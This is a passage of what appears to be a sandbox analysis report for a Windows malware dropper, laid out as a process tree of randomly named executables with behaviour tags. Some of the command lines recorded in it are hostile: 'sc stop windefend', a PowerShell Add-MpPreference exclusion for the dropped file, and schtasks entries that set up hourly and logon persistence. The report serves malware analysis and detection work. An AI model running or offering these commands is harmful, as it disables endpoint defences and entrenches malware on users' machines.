C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10924
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:856
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8480
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:9256
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10508
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:13176
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12532
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:688
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:2400
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:10340
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:11828
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:8540
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:4192
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:800
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:3840
-
-
C:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exeC:\Users\Admin\Documents\Nsuse6Bs42Jg34a5HyHe3clA.exe3⤵PID:12348
-
-
-
C:\Users\Admin\Documents\S3CRqe36iff2_Nv6VBKbQpQw.exe"C:\Users\Admin\Documents\S3CRqe36iff2_Nv6VBKbQpQw.exe"2⤵
- Executes dropped EXE
PID:668 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 2403⤵
- Program crash
PID:5256
-
-
-
C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:592 -
C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"C:\Users\Admin\Documents\RJdm3ls_W_5VxM1V2T9DXdH0.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4472
-
-
-
C:\Users\Admin\Documents\bfd4L5Z4LBZHBpciPielEr_1.exe"C:\Users\Admin\Documents\bfd4L5Z4LBZHBpciPielEr_1.exe"2⤵
- Executes dropped EXE
PID:2544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5016
-
-
-
C:\Users\Admin\Documents\ruGjMJliWgX5nR0pm0TwFFCX.exe"C:\Users\Admin\Documents\ruGjMJliWgX5nR0pm0TwFFCX.exe"2⤵
- Executes dropped EXE
PID:2108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2108 -s 2763⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
-
C:\Users\Admin\Documents\PsolucquGJn2LMUk30q2DGq7.exe"C:\Users\Admin\Documents\PsolucquGJn2LMUk30q2DGq7.exe"2⤵PID:2056
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4432
-
-
-
C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1820 -
C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"C:\Users\Admin\Documents\fvb8NG4vNomxEhKkfbBUqv26.exe"3⤵PID:4012
-
-
-
C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe"C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe"2⤵
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:4116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02ba5c54-5ea3-4ce2-91dd-d7ea856bcf88\test.bat"4⤵PID:5256
-
C:\Windows\system32\sc.exesc stop windefend5⤵PID:3280
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5736
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jAkEf6fFJtpWep78XXvMZnjX.exe" -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5480 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
PID:4844
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe3⤵PID:4588
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe3⤵PID:6140
-
-
-
C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1672 -
C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"C:\Users\Admin\Documents\j0sUeBlDf1wxCAeeqZqYWjvc.exe"3⤵PID:6604
-
-
-
C:\Users\Admin\Documents\F5yFWE1LUrF6bRZvC7tK_NaV.exe"C:\Users\Admin\Documents\F5yFWE1LUrF6bRZvC7tK_NaV.exe"2⤵
- Executes dropped EXE
PID:1612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2804
-
-
-
C:\Users\Admin\Documents\2j_km2DuQ1MuXjIYLHc6KD_q.exe"C:\Users\Admin\Documents\2j_km2DuQ1MuXjIYLHc6KD_q.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2092
-
-
C:\Users\Admin\Documents\HcoG3_mfZG59xXZ79oX3hhty.exe"C:\Users\Admin\Documents\HcoG3_mfZG59xXZ79oX3hhty.exe"2⤵
- Executes dropped EXE
PID:3480 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:5060
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Program Files (x86)\Company\NewProduct\inst1.exe"C:\Program Files (x86)\Company\NewProduct\inst1.exe"3⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Users\Admin\Documents\h9h_NpkpM446vmWTnqNXfbIA.exe"C:\Users\Admin\Documents\h9h_NpkpM446vmWTnqNXfbIA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4564
-
-
C:\Users\Admin\Documents\o2dobHH61A0I_mrTH1VIjxMA.exe"C:\Users\Admin\Documents\o2dobHH61A0I_mrTH1VIjxMA.exe"2⤵
- Executes dropped EXE
PID:1388 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1388 -s 3163⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2396
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe"C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2272 -
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:5052
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:5208
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:6096
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:1080
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:5472
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:1524
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:4256
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Executes dropped EXE
PID:3708
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:668
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5240
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4932
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5420
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6456
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6700
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6972
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3728
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6372
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3304
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6880
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3828
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3360
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2740
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4268
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4936
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5548
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5328
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5444
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1064
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5000
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6288
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7820
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4636
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7360
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7708
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8124
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5980
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7460
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7204
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7332
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6088
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6524
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7652
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5216
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7884
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5952
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6140
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4696
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5312
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7412
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6128
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2520
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4100
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2224
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3604
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1320
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2404
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2500
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4036
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2844
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4484
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4556
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5008
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1564
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4908
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1588
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4616
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6840
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1244
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1304
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2024
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6936
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6256
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6812
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3540
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5696
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:5524
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7080
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7980
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7636
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7136
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4988
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6948
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:1936
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4680
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3208
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3484
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6752
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:976
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:2560
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8544
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:8852
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9152
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:7260
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:3180
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:4172
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:6884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 284⤵
- Program crash
PID:9520
-
-
-
C:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exeC:\Users\Admin\Documents\Jz7VtM0locwi5F4upWphwMwh.exe3⤵PID:9240
-
-
